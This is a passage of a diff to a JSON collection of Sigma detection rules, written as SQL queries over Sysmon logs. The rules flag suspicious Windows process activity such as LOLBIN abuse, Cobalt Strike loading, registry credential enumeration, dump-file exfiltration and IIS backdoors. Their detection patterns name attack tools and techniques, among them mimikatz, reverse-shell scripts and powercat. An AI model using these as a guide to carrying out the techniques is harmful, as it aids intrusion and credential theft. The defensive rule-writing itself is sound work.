ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", - "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", + "status": "test", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential Suspicious Registry File Imported Via Reg.EXE", - "id": "62e0298b-e994-4189-bc87-bc699aa62d97", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate import of keys" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "status": "test", + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unlikely" + "Administrative activity" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_dridex.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Potential Password Spraying Attempt Using Dsacls.EXE", - "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", "status": "experimental", - "description": "Detects possible password spraying attempts using Dsacls", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1218" + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use of dsacls to bind to an LDAP session" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dsacls_password_spray.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "Explorer Process Tree Break", - "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", - "status": "test", - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", + "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "status": "experimental", + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_break_process_tree.yml" + "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" }, { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "title": "HH.EXE Execution", + "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"hh.exe\" to execute \".chm\" files.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ], "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "False positives are expected with legitimate \".CHM\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%.chm%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_hh_chm_execution.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", - "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "status": "test", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", - "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Enumeration for Credentials in Registry", + "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "status": "test", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" }, { - "title": "Suspicious Electron Application Child Processes", - "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\discord.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_electron_app_children.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "New Root Certificate Installed Via Certutil.EXE", - "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", - "status": "test", - "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Local Groups Reconnaissance Via Wmic.EXE", + "id": "164eda96-11b2-430b-85ff-6a265c15bf32", + "status": "experimental", + "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '% group%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_certificate_installation.yml" + "filename": "proc_creation_win_wmic_recon_group.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", + "title": "Visual Studio NodejsTools PressAnyKey Renamed Execution", + "id": "65c3ca2c-525f-4ced-968e-246a713d164f", "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'Microsoft.NodejsTools.PressAnyKey.exe' AND NOT ((Image LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_renamed_pressanykey.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "status": "experimental", + "description": "Detects suspicious commandline flags used by 